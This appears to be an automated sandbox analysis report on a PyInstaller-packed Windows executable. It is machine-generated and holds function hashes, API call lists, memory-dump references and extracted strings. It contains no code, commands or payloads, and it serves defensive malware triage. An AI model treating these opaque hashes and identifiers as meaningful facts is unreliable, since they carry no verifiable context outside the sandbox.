                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction ID: 2512fbdb768b8aa149cdf9070e354e8befd28865d8375289a040942718875d56
                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction Fuzzy Hash: B031F622B08B4142E760BB65B8502ABB695BF887C8F810135EF6D6B7D9DF3CD546C390
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7069
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7077
                                                                                      • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7090
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C70A2
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7110
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C711C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 916704608-2084034818
                                                                                      • Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                      • Instruction ID: 0f9aa2f1c090669d4c9ce12e5a00f937dddbd2dae8efe9ca9120d41991af0b76
                                                                                      • Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                      • Instruction Fuzzy Hash: 74318D21B1AF8692EE1AAB03AC005B56398BF04BB4F994575DD5D0B3E0EEBCE5648710
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1501936508-0
                                                                                      • Opcode ID: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
                                                                                      • Instruction ID: 2916e0e4180614e5f43bfe31f009f5bb150291c42e69522df6641eac65ec66db
                                                                                      • Opcode Fuzzy Hash: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
                                                                                      • Instruction Fuzzy Hash: EF51A331A0DE4782FAA5AB17DC4463963A4AF54FA4F8944B6CE4D067F4DFACE462C340
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1501936508-0
                                                                                      • Opcode ID: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
                                                                                      • Instruction ID: 567de5eac377899e8ce480c9a51d580babdad5b81c0d578c9791ce8f099bb060
                                                                                      • Opcode Fuzzy Hash: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
                                                                                      • Instruction Fuzzy Hash: C051D461A4DE4B82EA65EF139C446386394AF48FA0F8984B5DE9D067F4DFFCE4618340
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: {for
                                                                                      • API String ID: 2943138195-864106941
                                                                                      • Opcode ID: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
                                                                                      • Instruction ID: 387a958fa72e27ad202b2255a781edca7acbb2ea17e89f1bfe7f00bc906ecdbe
                                                                                      • Opcode Fuzzy Hash: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
                                                                                      • Instruction Fuzzy Hash: 14514F72A08E899EE701AF66DC443E837A4EB54758F8080B1EA4D47BE5DFBCE565C300
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameName::atol
                                                                                      • String ID: `template-parameter$void
                                                                                      • API String ID: 2130343216-4057429177
                                                                                      • Opcode ID: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
                                                                                      • Instruction ID: 6f45665923b3fcb19512321597e673b43bf491777d70ecf815a00f524f5a4c45
                                                                                      • Opcode Fuzzy Hash: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
                                                                                      • Instruction Fuzzy Hash: DE416C22F08F5A89FB009BA2DC512FC33B1BB487A8F950175CE4D16AA9DFBCA555C340
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD4D
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD5B
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD85
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDF3
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 2559590344-2084034818
                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction ID: 49d4018a666ae8789ed039aaefa646c712ae924cde501a2b2e9f5a88cd3f76e4
                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction Fuzzy Hash: 5A319321B1A741D1EF91AB92A4006B5B394FF48BA4F994535DD3D2E3C8DE3CE44482B0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+Replicator::operator[]
                                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                      • API String ID: 1405650943-2211150622
                                                                                      • Opcode ID: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
                                                                                      • Instruction ID: e9981fb8173089d25988408a1f9a60ba663e6c8c1ac83d7ed74c027bd095876a
                                                                                      • Opcode Fuzzy Hash: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
                                                                                      • Instruction Fuzzy Hash: 21413871E08F4A9EF7229B66DC542B837A1BB083A8F9445B1CA9C123F4DFBCA551C740
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: char $int $long $short $unsigned
                                                                                      • API String ID: 2943138195-3894466517
                                                                                      • Opcode ID: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
                                                                                      • Instruction ID: 04bfdd16242e79c7f4b8b1ce1031f33c59bc630cc7fda7d3c6345ceef6f1c2f7
                                                                                      • Opcode Fuzzy Hash: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
                                                                                      • Instruction Fuzzy Hash: B3315D72E18A5989E7169F6ADC541BC37B0FB09764F848171DA8C06BF8DEBCE914C710
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F3DD351A,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD2AA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-2900015858
                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction ID: 2338e62373cab731f4bafcc08fc800363c258485d9f93c51be2473388b693a90
                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction Fuzzy Hash: 2921A37261978242E7A0ABA1F8817E6B394FB883C0F800135FE9D6B699DF3CD1458790
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID:
                                                                                      • API String ID: 995526605-0
                                                                                      • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction ID: 39c2c2dd1efad5beee1ad3935f86356d63acf98b9d2b951d9ca8f070a925fc3f
                                                                                      • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction Fuzzy Hash: E4217531A0C64642EB90ABA5B48023AF3A0EF85BF0F940235EA7D5B7E8DE7CD4458750
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                      • Instruction ID: 6397378a33eb6dfd7396cd54dd04011d575d1aab3762eaaa148440c2ef8a86e4
                                                                                      • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                      • Instruction Fuzzy Hash: E3216D24A0E64341F7DC73A19A52239DA525F447B0FC14734DC7E6EBC6DD2CB48043A2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                      • String ID: CONOUT$
                                                                                      • API String ID: 3230265001-3130406586
                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction ID: 9b6a9472490d9b769d5be196821b737aa5cb5c82b1e9c9949af106ac281c8a4d
                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction Fuzzy Hash: 53119A21718A4186E790AB52E894329A2A0FF88BE4F800234DD7E9F7D4DF7CD5148790
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+$NameName::
                                                                                      • String ID:
                                                                                      • API String ID: 168861036-0
                                                                                      • Opcode ID: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
                                                                                      • Instruction ID: 5342506f55481fb985c21790e7473cd4cece63ce58edb80d2a4b1458a4f9a484
                                                                                      • Opcode Fuzzy Hash: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
                                                                                      • Instruction Fuzzy Hash: 73718C72E08E8A8AE711DF92EC442BC37A1BB54764F908075DA5D176E5DFBCE862C340
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8EFD
                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8F5A
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8FE5
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9044
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9055
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD906A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 3462794448-0
                                                                                      • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                      • Instruction ID: 40145a9dcc7ae26b6c931567a13f5dbdef37355701136006c814a1a5faf4dccd
                                                                                      • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                      • Instruction Fuzzy Hash: 3441D961A1968281EBB0BB61B4402BAB394FF84BC4F844135DF6DAB7C9DE3DE511C790
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 3741236498-0
                                                                                      • Opcode ID: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
                                                                                      • Instruction ID: 2308f2806ea307b3a894a679e0b416b978f09733185a98d81df21b488386760e
                                                                                      • Opcode Fuzzy Hash: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
                                                                                      • Instruction Fuzzy Hash: 4331A422B19F9695EA15EB579C0456933A0FF48BF0B998571DD2D033E0EE7DE8A2C304
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetCurrentProcess.KERNEL32 ref: 00007FF7F3DD8590
                                                                                        • Part of subcall function 00007FF7F3DD8570: OpenProcessToken.ADVAPI32 ref: 00007FF7F3DD85A3
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.ADVAPI32 ref: 00007FF7F3DD85C8
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetLastError.KERNEL32 ref: 00007FF7F3DD85D2
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.ADVAPI32 ref: 00007FF7F3DD8612
                                                                                        • Part of subcall function 00007FF7F3DD8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F3DD862E
                                                                                        • Part of subcall function 00007FF7F3DD8570: CloseHandle.KERNEL32 ref: 00007FF7F3DD8646
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD916C
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD9175
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                      • API String ID: 6828938-1529539262
                                                                                      • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                      • Instruction ID: 5c559135aa7fa92dd1b9bc85adf760504fe181482b3f7e05a792f7f0c7c96ced
                                                                                      • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                      • Instruction Fuzzy Hash: A6215321A0874281F790BBA0E8552EAB361FF84780FC44135EA6D6B7D9DF3CE84587E0
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB2D7
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB30D
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB33A
